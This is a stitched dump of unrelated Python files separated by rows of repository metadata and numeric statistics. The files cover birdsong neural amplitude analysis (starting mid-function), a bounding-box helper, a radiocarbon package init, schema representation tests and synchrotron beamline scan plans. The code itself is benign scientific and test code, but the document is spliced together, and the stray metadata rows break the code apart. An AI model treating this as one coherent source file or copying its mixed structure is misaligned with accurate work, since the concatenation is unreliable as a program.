    # Get starts of the events of interest (syllables)
    testclass = birds_context_obj(bird_id=bird_id)
    # Get the context array for the day's data
    test_context = testclass.get_all_context_index_arrays(chunk_labels_list)
    # Select labels using flexible context selection
    first_syll = label_focus_context(focus=1,
                                     labels=chunk_labels_list,
                                     starts=chunk_onsets_list[0],
                                     contexts=test_context,
                                     context_func=first_context_func)
    last_syll = label_focus_context(focus=all_last_syllable[bird_id],
                                    labels=chunk_labels_list,
                                    starts=chunk_onsets_list[1],
                                    contexts=test_context,
                                    context_func=last_context_func)
    # Set the context windows around each event
    first_window = (-100, 200)
    last_window = (-100, 200)
    # Clip around the events of interest
    all_firsts = fet.get_event_related_nd_chunk(chunk_data=proc_data2, chunk_indices=first_syll,
                                                fs=1000, window=first_window)
    all_lasts = fet.get_event_related_nd_chunk(chunk_data=proc_data2, chunk_indices=last_syll,
                                               fs=1000, window=last_window)
    # Correct the shape of the data
    all_firsts = fet.event_shape_correction(all_firsts, original_dim=3)
    all_lasts = fet.event_shape_correction(all_lasts, original_dim=3)
    # Make them ndarray indexable
    all_firsts = np.asarray(all_firsts)
    all_lasts = np.asarray(all_lasts)
    # Before-bout amplitude change: window start minus window end
    diff_amplitude_before = all_firsts[:, :, :, 100] - all_firsts[:, :, :, 200]
    diff_amplitude_before = np.delete(diff_amplitude_before, bad_channels, axis=2)  # Remove bad channels
    # Break between above and below 50 Hz (bin 65 of the log-spaced axis)
    diff_amplitude_before_low_freq = diff_amplitude_before[:, :65, :]
    diff_amplitude_before_high_freq = diff_amplitude_before[:, 65:, :]
    # Reshape arrays to (instances, features)
    diff_amplitude_before_low_freq = np.reshape(diff_amplitude_before_low_freq, (len(diff_amplitude_before), -1))
    diff_amplitude_before_high_freq = np.reshape(diff_amplitude_before_high_freq, (len(diff_amplitude_before), -1))
    # After-bout amplitude change
    diff_amplitude_after = all_lasts[:, :, :, 100] - all_lasts[:, :, :, 200]
    diff_amplitude_after = np.delete(diff_amplitude_after, bad_channels, axis=2)  # Remove bad channels
    # BUGFIX: these two slices were swapped relative to the "before"
    # section ([:65] had been assigned to *_high_freq), so the arrays
    # saved as "after_high"/"after_low" were mislabeled.  The split now
    # matches the before-bout features.
    diff_amplitude_after_low_freq = diff_amplitude_after[:, :65, :]
    diff_amplitude_after_high_freq = diff_amplitude_after[:, 65:, :]
    # Reshape arrays to (instances, features)
    diff_amplitude_after_low_freq = np.reshape(diff_amplitude_after_low_freq, (len(diff_amplitude_after), -1))
    diff_amplitude_after_high_freq = np.reshape(diff_amplitude_after_high_freq, (len(diff_amplitude_after), -1))
    # Save the before: low freq
    _save_numpy_data(data=diff_amplitude_before_low_freq, data_name="bout_amplitude_analysis_before_low",
                     bird_id=bird_id, session=session, destination=bout_amplitude_analysis_path, make_parents=True,
                     verbose=True)
    # Save the before: high freq
    _save_numpy_data(data=diff_amplitude_before_high_freq, data_name="bout_amplitude_analysis_before_high",
                     bird_id=bird_id, session=session, destination=bout_amplitude_analysis_path, make_parents=True,
                     verbose=True)
    # Save the after: high freq
    _save_numpy_data(data=diff_amplitude_after_high_freq, data_name="bout_amplitude_analysis_after_high",
                     bird_id=bird_id, session=session, destination=bout_amplitude_analysis_path, make_parents=True,
                     verbose=True)
    # Save the after: low freq
    _save_numpy_data(data=diff_amplitude_after_low_freq, data_name="bout_amplitude_analysis_after_low", bird_id=bird_id,
                     session=session, destination=bout_amplitude_analysis_path, make_parents=True, verbose=True)
def get_bout_amplitude_analysis_results2(bird_id='z007', session='day-2016-09-09'):
    """Load the four saved arrays of the second ("2"-suffixed) analysis run.

    Returns (before_low, before_high, after_high, after_low) as written
    by run_bout_amplitude_analysis2.  (The "Save the ..." comments in the
    original were copy-paste leftovers -- these calls load.)
    """
    def _load(name):
        # One saved array, keyed by bird/session under the analysis path.
        return _load_numpy_data(data_name=name, bird_id=bird_id, session=session,
                                source=bout_amplitude_analysis_path, verbose=True)
    bout_amplitude_analysis_before_low = _load("bout_amplitude_analysis_before_low2")
    bout_amplitude_analysis_before_high = _load("bout_amplitude_analysis_before_high2")
    bout_amplitude_analysis_after_high = _load("bout_amplitude_analysis_after_high2")
    bout_amplitude_analysis_after_low = _load("bout_amplitude_analysis_after_low2")
    return (bout_amplitude_analysis_before_low, bout_amplitude_analysis_before_high,
            bout_amplitude_analysis_after_high, bout_amplitude_analysis_after_low)
def run_bout_amplitude_analysis2(bird_id='z007', session='day-2016-09-09'):
    """Variant of run_bout_amplitude_analysis with a tighter window.

    Identical pipeline except mv_avg=50 smoothing, a (-50, 100) event
    window, the change taken as window index 50 minus index 100, and the
    outputs saved under "...2"-suffixed names.

    :param bird_id: subject identifier (keys into all_bad_channels etc.)
    :param session: recording session ('day-...') to process
    """
    zdata = ImportData(bird_id=bird_id, session=session)
    # Format handlabels for use
    chunk_labels_list, chunk_onsets_list = fet.get_chunk_handlabels(handlabels_list=zdata.song_handlabels)
    # Switch to the log-spaced frequency bins
    freq_bins = 100
    fc_lo = np.logspace(np.log10(2), np.log10(220), freq_bins)
    fc_hi = np.logspace(np.log10(3), np.log10(250), freq_bins)
    # Get channels to exclude from the common-average reference (CAR)
    bad_channels = all_bad_channels[bird_id]
    proc_data2 = hbp.feature_extraction_chunk(neural_chunks=zdata.song_neural,
                                              fs=1000,
                                              l_freqs=fc_lo,
                                              h_freqs=fc_hi,
                                              hilbert="amplitude",
                                              z_score=True,
                                              mv_avg=50,
                                              bad_channels=bad_channels,
                                              verbose=True)
    # Get starts of the events of interest (syllables)
    testclass = birds_context_obj(bird_id=bird_id)
    # Get the context array for the day's data
    test_context = testclass.get_all_context_index_arrays(chunk_labels_list)
    # Select labels using flexible context selection
    first_syll = label_focus_context(focus=1,
                                     labels=chunk_labels_list,
                                     starts=chunk_onsets_list[0],
                                     contexts=test_context,
                                     context_func=first_context_func)
    last_syll = label_focus_context(focus=all_last_syllable[bird_id],
                                    labels=chunk_labels_list,
                                    starts=chunk_onsets_list[1],
                                    contexts=test_context,
                                    context_func=last_context_func)
    # Set the context windows around each event
    first_window = (-50, 100)
    last_window = (-50, 100)
    # Clip around the events of interest
    all_firsts = fet.get_event_related_nd_chunk(chunk_data=proc_data2, chunk_indices=first_syll,
                                                fs=1000, window=first_window)
    all_lasts = fet.get_event_related_nd_chunk(chunk_data=proc_data2, chunk_indices=last_syll,
                                               fs=1000, window=last_window)
    # Correct the shape of the data
    all_firsts = fet.event_shape_correction(all_firsts, original_dim=3)
    all_lasts = fet.event_shape_correction(all_lasts, original_dim=3)
    # Make them ndarray indexable
    all_firsts = np.asarray(all_firsts)
    all_lasts = np.asarray(all_lasts)
    # Before-bout amplitude change: window start minus window end
    diff_amplitude_before = all_firsts[:, :, :, 50] - all_firsts[:, :, :, 100]
    diff_amplitude_before = np.delete(diff_amplitude_before, bad_channels, axis=2)  # Remove bad channels
    # Break between above and below 50 Hz (bin 65 of the log-spaced axis)
    diff_amplitude_before_low_freq = diff_amplitude_before[:, :65, :]
    diff_amplitude_before_high_freq = diff_amplitude_before[:, 65:, :]
    # Reshape arrays to (instances, features)
    diff_amplitude_before_low_freq = np.reshape(diff_amplitude_before_low_freq, (len(diff_amplitude_before), -1))
    diff_amplitude_before_high_freq = np.reshape(diff_amplitude_before_high_freq, (len(diff_amplitude_before), -1))
    # After-bout amplitude change
    diff_amplitude_after = all_lasts[:, :, :, 50] - all_lasts[:, :, :, 100]
    diff_amplitude_after = np.delete(diff_amplitude_after, bad_channels, axis=2)  # Remove bad channels
    # BUGFIX: these two slices were swapped relative to the "before"
    # section ([:65] had been assigned to *_high_freq), so the arrays
    # saved as "after_high2"/"after_low2" were mislabeled.  The split now
    # matches the before-bout features.
    diff_amplitude_after_low_freq = diff_amplitude_after[:, :65, :]
    diff_amplitude_after_high_freq = diff_amplitude_after[:, 65:, :]
    # Reshape arrays to (instances, features)
    diff_amplitude_after_low_freq = np.reshape(diff_amplitude_after_low_freq, (len(diff_amplitude_after), -1))
    diff_amplitude_after_high_freq = np.reshape(diff_amplitude_after_high_freq, (len(diff_amplitude_after), -1))
    # Save the before: low freq
    _save_numpy_data(data=diff_amplitude_before_low_freq, data_name="bout_amplitude_analysis_before_low2",
                     bird_id=bird_id, session=session, destination=bout_amplitude_analysis_path, make_parents=True,
                     verbose=True)
    # Save the before: high freq
    _save_numpy_data(data=diff_amplitude_before_high_freq, data_name="bout_amplitude_analysis_before_high2",
                     bird_id=bird_id, session=session, destination=bout_amplitude_analysis_path, make_parents=True,
                     verbose=True)
    # Save the after: high freq
    _save_numpy_data(data=diff_amplitude_after_high_freq, data_name="bout_amplitude_analysis_after_high2",
                     bird_id=bird_id, session=session, destination=bout_amplitude_analysis_path, make_parents=True,
                     verbose=True)
    # Save the after: low freq
    _save_numpy_data(data=diff_amplitude_after_low_freq, data_name="bout_amplitude_analysis_after_low2", bird_id=bird_id,
                     session=session, destination=bout_amplitude_analysis_path, make_parents=True, verbose=True)
| 50.746269
| 121
| 0.680294
| 1,709
| 13,600
| 4.978935
| 0.103569
| 0.091668
| 0.130803
| 0.028205
| 0.923493
| 0.914091
| 0.914091
| 0.914091
| 0.914091
| 0.914091
| 0
| 0.020819
| 0.247721
| 13,600
| 267
| 122
| 50.93633
| 0.810869
| 0.115441
| 0
| 0.745098
| 0
| 0
| 0.05672
| 0.049202
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026144
| false
| 0
| 0.065359
| 0
| 0.104575
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2b3776e28f5d2eaeae76c93b494ac07a9804f064
| 113
|
py
|
Python
|
data/operator/bbox/xyxy2polygon.py
|
zhangzhengde0225/SwinTrack
|
526be17f8ef266cb924c6939bd8dda23e9b73249
|
[
"MIT"
] | 143
|
2021-12-03T02:33:36.000Z
|
2022-03-29T00:01:48.000Z
|
data/operator/bbox/xyxy2polygon.py
|
zhangzhengde0225/SwinTrack
|
526be17f8ef266cb924c6939bd8dda23e9b73249
|
[
"MIT"
] | 33
|
2021-12-03T10:32:05.000Z
|
2022-03-31T02:13:55.000Z
|
data/operator/bbox/xyxy2polygon.py
|
zhangzhengde0225/SwinTrack
|
526be17f8ef266cb924c6939bd8dda23e9b73249
|
[
"MIT"
] | 24
|
2021-12-04T06:46:42.000Z
|
2022-03-30T07:57:47.000Z
|
def bbox_xyxy2polygon(bbox):
    """Convert a box given as (x1, y1, x2, y2) into a flat 4-corner polygon.

    The polygon visits (x1, y1), (x1, y2), (x2, y2), (x2, y1) and is
    returned as the flat tuple (x1, y1, x1, y2, x2, y2, x2, y1).
    """
    x1, y1, x2, y2 = bbox[0], bbox[1], bbox[2], bbox[3]
    return (x1, y1,
            x1, y2,
            x2, y2,
            x2, y1)
| 37.666667
| 83
| 0.619469
| 21
| 113
| 3.285714
| 0.380952
| 0.144928
| 0.26087
| 0.289855
| 0.347826
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091837
| 0.132743
| 113
| 2
| 84
| 56.5
| 0.612245
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
99205316958d8e011ce63cdadf91c53dfea3333e
| 153
|
py
|
Python
|
thanados/models/iosacal/__init__.py
|
stefaneichert/thanados
|
262b97e995425ddfe49dae0089f7de6ca58842e7
|
[
"MIT"
] | 15
|
2019-11-15T15:54:52.000Z
|
2022-01-27T10:51:18.000Z
|
thanados/models/iosacal/__init__.py
|
nhmvienna/thanados
|
262b97e995425ddfe49dae0089f7de6ca58842e7
|
[
"MIT"
] | 1
|
2022-01-05T09:38:58.000Z
|
2022-03-08T11:10:02.000Z
|
thanados/models/iosacal/__init__.py
|
nhmvienna/thanados
|
262b97e995425ddfe49dae0089f7de6ca58842e7
|
[
"MIT"
] | 5
|
2019-11-21T14:46:12.000Z
|
2022-02-25T16:10:24.000Z
|
# Package initialiser: re-export the public calibration API of the
# vendored iosacal modules so callers can import R, combine and iplot
# directly from thanados.models.iosacal.
# NOTE(review): the first line imports the package being initialised
# (self-import) -- looks redundant; confirm before removing.
import thanados.models.iosacal
from thanados.models.iosacal.core import R, combine
from thanados.models.iosacal.plot import iplot
# Version of the bundled iosacal code.
# NOTE(review): the conventional name is __version__ (lowercase); renaming
# would break any external reader of __VERSION__, so it is left as-is.
__VERSION__ = '0.4.1'
| 25.5
| 51
| 0.810458
| 23
| 153
| 5.217391
| 0.608696
| 0.35
| 0.525
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021739
| 0.098039
| 153
| 5
| 52
| 30.6
| 0.847826
| 0
| 0
| 0
| 0
| 0
| 0.03268
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
99a99357b06abff6286ce8b7c086fa2c14f09841
| 1,650
|
py
|
Python
|
tests/list/test_list_of_representation.py
|
nikitanovosibirsk/district42
|
0c13248919fc96bde16b9634a8ea468e4882752a
|
[
"Apache-2.0"
] | 1
|
2016-09-16T04:09:19.000Z
|
2016-09-16T04:09:19.000Z
|
tests/list/test_list_of_representation.py
|
nikitanovosibirsk/district42
|
0c13248919fc96bde16b9634a8ea468e4882752a
|
[
"Apache-2.0"
] | 2
|
2021-06-14T05:53:49.000Z
|
2022-02-01T14:26:31.000Z
|
tests/list/test_list_of_representation.py
|
nikitanovosibirsk/district42
|
0c13248919fc96bde16b9634a8ea468e4882752a
|
[
"Apache-2.0"
] | null | null | null |
from baby_steps import given, then, when
from district42 import represent, schema
def test_list_of_representation():
    """A bare list-of-bool schema renders back to its constructor expression."""
    with given:
        sut = schema.list(schema.bool)
    with when:
        rendered = represent(sut)
    with then:
        assert rendered == "schema.list(schema.bool)"
def test_list_of_values_representation():
    """An element schema carrying a value is rendered with that value."""
    with given:
        sut = schema.list(schema.int(1))
    with when:
        rendered = represent(sut)
    with then:
        assert rendered == "schema.list(schema.int(1))"
def test_list_of_repr_values_representation():
    """String element values are rendered via repr (single quotes)."""
    with given:
        sut = schema.list(schema.str("banana"))
    with when:
        rendered = represent(sut)
    with then:
        assert rendered == "schema.list(schema.str('banana'))"
def test_list_of_len_representation():
    """An exact-length constraint is rendered as a .len(n) call."""
    with given:
        sut = schema.list(schema.int).len(10)
    with when:
        rendered = represent(sut)
    with then:
        assert rendered == "schema.list(schema.int).len(10)"
def test_list_of_min_len_representation():
    """A minimum-only length constraint is rendered as .len(n, ...)."""
    with given:
        sut = schema.list(schema.int).len(1, ...)
    with when:
        rendered = represent(sut)
    with then:
        assert rendered == "schema.list(schema.int).len(1, ...)"
def test_list_of_max_len_representation():
    """A maximum-only length constraint is rendered as .len(..., n)."""
    with given:
        sut = schema.list(schema.int).len(..., 10)
    with when:
        rendered = represent(sut)
    with then:
        assert rendered == "schema.list(schema.int).len(..., 10)"
def test_list_of_min_max_len_representation():
    """Both length bounds are rendered as .len(min, max)."""
    with given:
        list_schema = schema.list(schema.int).len(1, 10)
    with when:
        rendered = represent(list_schema)
    with then:
        assert rendered == "schema.list(schema.int).len(1, 10)"
| 20.37037
| 60
| 0.615152
| 220
| 1,650
| 4.463636
| 0.136364
| 0.142566
| 0.228106
| 0.193483
| 0.879837
| 0.834012
| 0.834012
| 0.789206
| 0.688391
| 0.688391
| 0
| 0.016313
| 0.25697
| 1,650
| 80
| 61
| 20.625
| 0.784666
| 0
| 0
| 0.54902
| 0
| 0
| 0.136364
| 0.124848
| 0
| 0
| 0
| 0
| 0.137255
| 1
| 0.137255
| false
| 0
| 0.039216
| 0
| 0.176471
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
41deb224012263f22de46bee131a15d48d38fa8f
| 32,116
|
py
|
Python
|
startup/users/30-user-Gomez.py
|
mrakitin/profile_collection-smi
|
1eea45a3b886b2c0daeec715ce94f27da24d0ba3
|
[
"BSD-3-Clause"
] | null | null | null |
startup/users/30-user-Gomez.py
|
mrakitin/profile_collection-smi
|
1eea45a3b886b2c0daeec715ce94f27da24d0ba3
|
[
"BSD-3-Clause"
] | 13
|
2018-09-25T19:35:08.000Z
|
2021-01-15T20:42:26.000Z
|
startup/users/30-user-Gomez.py
|
mrakitin/profile_collection-smi
|
1eea45a3b886b2c0daeec715ce94f27da24d0ba3
|
[
"BSD-3-Clause"
] | 3
|
2019-09-06T01:40:59.000Z
|
2020-07-01T20:27:39.000Z
|
def ex_situ_hardxray(t=1):
    """Measure a fixed batch of ex-situ samples with hard X-rays.

    For each WAXS arc angle, drives the piezo stage to every sample's
    (x, y) position and runs a relative piezo.y scan with both area
    detectors.

    t -- exposure time in seconds, applied to both detector timers.
    """
    # Coordinate lists of earlier sample batches, kept for reference:
    # samples = ['PLA2','PLA1','CON6','CON5', 'CON4','CON3','CON2','CON1',
    # '05_Ca_1', '05_Ca_2', '05_UT_1', '05_UT_2', 'PLA6','PLA4','PLA3',
    # ]
    # samples = ['B5_1','B5_2','B5_3', 'B6_1','B6_2','B6_3','B7_1','B7_2','B7_3','B12_1','B12_2','B12_3']
    # x_list = [45550, 41200, 35600, 25600, 20900, 15400, -1900, -7900, -14000, -24100, -28200, -32700, ]
    # y_list = [-9300, -9300, -9300, -9300, -9300, -9300, -9300, -9300, -9300, -9300, -9300, -9300]
    # samples = ['A1_1','A1_2','A1_3', 'A1_4','A2_5','A2_6','A2_7','A2_8','A3_9','A3_10','A3_11','A3_12','A3_13','A3_14','A4_15', 'A4_16', 'A4_17', 'A4_19']
    # x_list = [45950, 43250, 37250, 31650, 24400, 18850, 12500, 8000, -3400, -7300, -11300, -16800, -20900, -26400, -33000, -37400, -41900, -45200]
    # y_list = [3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500]
    # samples = ['C8_32', 'C8_33', 'C8_34', 'C8_35', 'C9_36', 'C9_37', 'C9_38', 'C9_39', 'C10_40', 'C10_41', 'C10_42', 'C10_43',
    #            'C10_44', 'C10_45', 'C11_46', 'C11_47', 'C11_48', 'C11_49', 'C11_50']
    # x_list = [43700, 38300, 34000, 27800, 20900, 16200, 12100, 7100, -2700, -6700, -10500, -15700, -20000,
    #           -24200, -29300, -32700, -36700, -41000, -45000]
    # y_list = [3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700,
    #          3700, 3700, 3700, 3700, 3700, 3700]
    # Current batch: sample names and stage coordinates (units are whatever
    # piezo.x / piezo.y use — TODO confirm they are microns).
    samples = ['D13_51','D13_52','D13_53','D14_54','D14_55','D14_56','D15_57','D15_58','D15_59','D16_60','D16_61','D16_62','D16_63','D16_64',
               'D17_65','D17_66','D17_67']
    x_list = [43700, 38400, 34000, 25200, 20000, 15400, 6700, 2500, -2300, -6800, -14000, -19000, -23300, -28500,
              -34700, -39300, -43600]
    y_list = [-9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880,
              -9880, -9880, -9880]
    # Detectors, motors:
    dets = [pil1M, pil300KW]
    waxs_range = np.linspace(13, 0, 3)  # WAXS arc angles: 13, 6.5, 0
    ypos = [0, 400, 3]  # rel_scan args for piezo.y: start, stop, number of points
    assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
    assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
    det_exposure_time(t,t)
    for wa in waxs_range:
        yield from bps.mv(waxs, wa)
        for sam, x, y in zip(samples, x_list, y_list):
            yield from bps.mv(piezo.x, x)
            yield from bps.mv(piezo.y, y)
            name_fmt = '{sam}_wa{waxs}'
            sample_name = name_fmt.format(sam=sam, waxs='%2.1f'%wa)
            sample_id(user_name='OS', sample_name=sample_name)
            yield from bp.rel_scan(dets, piezo.y, *ypos)
    # Reset metadata and drop exposure time back to 0.3 s when done.
    sample_id(user_name='test', sample_name='test')
    det_exposure_time(0.3,0.3)
def NEXAFS_Fe_edge(t=0.5, name='sample1'):
    """NEXAFS scan across the Fe edge: 7100-7150 eV in 1 eV steps.

    Takes one pil300KW count at each energy, then moves the energy back
    to 7100 eV.

    t    -- detector exposure time (s).
    name -- sample label used in the recorded sample_name.
    """
    dets = [pil300KW]
    #name = 'Kapton_NEXAFS_1_gvopen_wa70_'
    #x = [8800]
    energies = np.linspace(7100, 7150, 51)
    #for name, x in zip(names, x):
    #bps.mv(piezo.x, x)
    det_exposure_time(t,t)
    name_fmt = '{sample}_{energy}eV_xbpm{xbpm}'
    for e in energies:
        yield from bps.mv(energy, e)
        # The current XBPM3 sum signal is embedded in the sample name.
        sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value)
        sample_id(user_name='SR', sample_name=sample_name)
        print(f'\n\t=== Sample: {sample_name} ===\n')
        yield from bp.count(dets, num=1)
    yield from bps.mv(energy, 7100)
    #name_fmt = '{sample}_2430eV_postmeas_xbpm{xbpm}'
    #sample_name = name_fmt.format(sample=name, xbpm = '%3.1f'%xbpm3.sumY.value)
    #sample_id(user_name='GF', sample_name=sample_name)
    #print(f'\n\t=== Sample: {sample_name} ===\n')
    #yield from bp.count(dets, num=1)
def SAXS_Fe_edge(t=0.5):
    """Per-sample Fe-edge sequence: NEXAFS first, then SAXS at fixed energies.

    For each sample position: run NEXAFS_Fe_edge, then take pil1M counts
    at three x-offsets from the sample origin for every energy in
    `energies`, ending each offset with a post-measurement frame back at
    7100 eV.

    t -- exposure time (s) for the SAXS frames (the NEXAFS pass uses t=1).
    """
    dets = [pil1M]
    names = ['Ca10_2_SAXS_sdd5_1s_redo_','Ca2_2_SAXS_sdd5_1s_redo_', 'Ca2_4_SAXS_sdd5_1s_redo_', 'PBS_2_SAXS_sdd5_1s_redo_']
    names1 = ['Ca10_2_NEXAFS_wa0_redo_','Ca2_2_NEXAFS_wa0_redo_', 'Ca2_4_NEXAFS_wa0_redo_', 'PBS_2_NEXAFS_wa0_redo_']
    xs = [-36600, -10600, 15400, 41100]
    ys = [-1050, -1050, -1050, -1050]
    energies = [7100, 7110, 7114, 7115, 7118, 7120, 7125, 7140]
    for i, (name, name1, x, y) in enumerate(zip(names, names1, xs, ys)):
        yield from bps.mv(piezo.x, x)
        yield from bps.mv(piezo.y, y)
        yield from NEXAFS_Fe_edge(t=1, name=name1)
        dets = [pil1M]  # NOTE(review): redundant — dets is not changed by the NEXAFS call
        det_exposure_time(t,t)
        xsss = [x+400, x + 900, x + 1200]  # three fresh spots offset from the NEXAFS spot
        for j, xss in enumerate(xsss):
            yield from bps.mv(piezo.x, xss)
            for e in energies:
                name_fmt = '{sample}_pos{pos}_{energy}eV_xbpm{xbpm}'
                yield from bps.mv(energy, e)
                sample_name = name_fmt.format(sample=name, pos = '%2.2d'%j, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value)
                sample_id(user_name='SR', sample_name=sample_name)
                print(f'\n\t=== Sample: {sample_name} ===\n')
                yield from bp.count(dets, num=1)
            # Post-measurement frame at the starting energy for this spot.
            yield from bps.mv(energy, 7100)
            name_fmt = '{sample}_pos{pos}_7100eV_postmeas_xbpm{xbpm}'
            sample_name = name_fmt.format(sample=name, pos = '%2.2d'%j, xbpm = '%3.1f'%xbpm3.sumY.value)
            sample_id(user_name='GF', sample_name=sample_name)
            print(f'\n\t=== Sample: {sample_name} ===\n')
            yield from bp.count(dets, num=1)
def NEXAFS_Ag_edge(t=0.5):
    """NEXAFS energy scan 3340-3390 eV in 1 eV steps for a hard-coded sample.

    One pil300KW count per energy with a 2 s pause after each, then moves
    back to 3340 eV and settles for 10 s.
    """
    dets = [pil300KW]
    name = 'N2_redo_GINEXAFS_wa75_'
    #x = [8800]
    energies = np.linspace(3340, 3390, 51)
    #for name, x in zip(names, x):
    #bps.mv(piezo.x, x)
    det_exposure_time(t,t)
    name_fmt = '{sample}_{energy}eV_xbpm{xbpm}'
    for e in energies:
        yield from bps.mv(energy, e)
        sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value)
        sample_id(user_name='SR', sample_name=sample_name)
        print(f'\n\t=== Sample: {sample_name} ===\n')
        yield from bp.count(dets, num=1)
        yield from bps.sleep(2)
    yield from bps.mv(energy, 3340)
    yield from bps.sleep(10)
def GISAXS_Ca_edge(t=0.5):
    """Ca-edge GISAXS over a list of samples.

    Per sample: move to (x, z), cycle the GV7 gate valve open, run the
    grazing-incidence alignment, insert the attenuator and close the
    valve, then measure every WAXS-angle / energy / incident-angle
    combination. Energy steps back down 4050 -> 4030 after each series.

    t -- detector exposure time (s).
    """
    dets = [pil300KW]
    names = ['O_9_gisaxs','O_8_gisaxs','O_7_gisaxs','O_6_gisaxs','O_5_gisaxs','O_4_gisaxs','O_3_gisaxs','O_2_gisaxs','O_1_gisaxs','Si_last_gisaxs']
    xs = [-50000, -38500, -22500, -11500, 500, 15000, 27000, 41000, 50000, 31400]
    zs = [700, 0, -800, 400, 1900, -2000, -1000, 300, -600, -800]
    energies = [4030, 4050, 4055, 4075]
    det_exposure_time(t,t)
    name_fmt = '{sample}_{energy}eV_ai{ai}_xbpm{xbpm}_wa{wa}'
    angles = [0.38, 0.4]  # incident angles added to the aligned theta
    wax = [0, 6.5, 13]
    th_0 = piezo.th.position
    for x, z, name in zip(xs, zs, names):
        yield from bps.mv(piezo.th, th_0)
        yield from bps.mv(piezo.x, x)
        yield from bps.mv(piezo.z, z)
        # Valve command is issued twice with a pause in between —
        # presumably to make sure the valve actually actuates (TODO confirm).
        yield from bps.mv(GV7.open_cmd, 1 )
        yield from bps.sleep(5)
        yield from bps.mv(GV7.open_cmd, 1 )
        yield from alignement_gisaxs(0.3)
        yield from bps.mv(att2_11, 'Insert')
        yield from bps.mv(GV7.close_cmd, 1 )
        yield from bps.sleep(5)
        yield from bps.mv(att2_11, 'Insert')
        yield from bps.mv(GV7.close_cmd, 1 )
        th_0 = piezo.th.position  # re-read theta after the alignment moved it
        for wa in wax:
            yield from bps.mv(waxs, wa)
            for k, e in enumerate(energies):
                yield from bps.mv(energy, e)
                for alpha_i in angles:
                    yield from bps.mv(piezo.th, th_0 + alpha_i)
                    sample_name = name_fmt.format(sample=name, energy=e, ai='%3.2f'%alpha_i, xbpm = '%3.1f'%xbpm3.sumY.value, wa='%2.1f'%wa)
                    sample_id(user_name='SR', sample_name=sample_name)
                    print(f'\n\t=== Sample: {sample_name} ===\n')
                    yield from bp.count(dets, num=1)
            yield from bps.mv(energy, 4050)
            yield from bps.mv(energy, 4030)
def SAXS_Ca_edge_hyd(t=0.5):
    """Ca-edge SAXS of the hydrated-cell blank.

    For each energy, shifts piezo.x to a fresh column (k*500), measures
    five spots spaced 200 apart in piezo.y, restores y, then steps the
    energy back down 4050 -> 4030 at the end.
    """
    dets = [pil1M]
    name = 'hyd_cell_blank'
    energies = [4030, 4050, 4055, 4075]
    det_exposure_time(t,t)
    name_fmt = '{sample}_{energy}eV_xbpm{xbpm}_sp{sp}'
    x_pos = piezo.x.position
    y_pos = piezo.y.position
    for k, e in enumerate(energies):
        yield from bps.mv(energy, e)
        yield from bps.mv(piezo.x, x_pos + k*500)
        for i in range(0, 5, 1):
            yield from bps.mv(piezo.y, y_pos + i*200)
            sample_name = name_fmt.format(sample=name, energy=e, sp='%2.2d'%i, xbpm = '%3.1f'%xbpm3.sumY.value)
            sample_id(user_name='JDM', sample_name=sample_name)
            print(f'\n\t=== Sample: {sample_name} ===\n')
            yield from bp.count(dets, num=1)
        yield from bps.mv(piezo.y, y_pos)
    yield from bps.mv(energy, 4050)
    yield from bps.mv(energy, 4030)
def SAXS_Ca_edge_hyd_onespot(t=0.5):
    """Ca-edge SAXS of the hydrated-cell blank at a fixed x position.

    For each energy, measures five spots spaced 200 apart in piezo.y,
    restores y, and finally steps the energy back down 4050 -> 4030.
    """
    dets = [pil1M]
    name = 'hyd_cell_blank_onespot2'
    energies = [4030, 4040, 4050, 4055, 4075]
    det_exposure_time(t,t)
    name_fmt = '{sample}_{energy}eV_xbpm{xbpm}_sp{sp}'
    y_pos = piezo.y.position
    for k, e in enumerate(energies):
        yield from bps.mv(energy, e)
        for i in range(0, 5, 1):
            yield from bps.mv(piezo.y, y_pos + i*200)
            sample_name = name_fmt.format(sample=name, energy=e, sp='%2.2d'%i, xbpm = '%3.1f'%xbpm3.sumY.value)
            sample_id(user_name='JDM', sample_name=sample_name)
            print(f'\n\t=== Sample: {sample_name} ===\n')
            yield from bp.count(dets, num=1)
